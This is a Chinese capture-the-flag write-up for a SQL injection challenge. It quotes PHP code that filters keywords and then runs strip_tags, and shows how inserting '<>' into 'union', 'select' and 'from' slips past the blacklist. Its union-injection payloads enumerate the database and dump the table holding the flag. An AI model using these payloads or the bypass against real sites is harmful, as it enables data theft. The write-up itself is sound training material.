题目连接:http://103.238.227.13:10087/
//过滤sql$array = array('table','union','and','or','load_file','create','delete','select','update','sleep','alter','drop','truncate','from','max','min','order','limit');
foreach ($array as $value){
if (substr_count($id, $value) > 0){
exit('包含敏感关键字!'.$value);
}
}
//xss过滤
$id = strip_tags($id);
$query = "SELECT * FROM temp WHERE id={$id} LIMIT 1";
先分析下代码,
(1)根据最开始的题意,flag值是在key表中,和题目下面的代码temp可能是不在同一个数据库中,所以我们要进行联合注入爆库名
(2)我们可以猜测$id是我们以get方式传递进去的数据。
(3)substr_count是判断后面一个参数(字符串)在前面一个参数出现的个数。
(4)strip_tags是将html页面进行过滤,我们可以利用这一点,例如:union会在被foreach那边过滤,但是如果是uni<>on的话,我们就可过掉foreach,之后在strip_tags中我们可以得到union,从而实现我们想要的过滤操作。
首先:
第一步:根据分析,id是存在注入点的,我们进行联合注入爆库名
(1)-1 union select 1,databases() 直接提交的话会提示报错,所以我们进行加工,得到(2)
(2)-1 uni<>on se<>lect 1,databases()%23
我们得到数据库名 sql3
第二步:联合注入
(1)-1 uni<>on se<>lect * fr<>om sql3.key%23
这样我们就可以得到flag值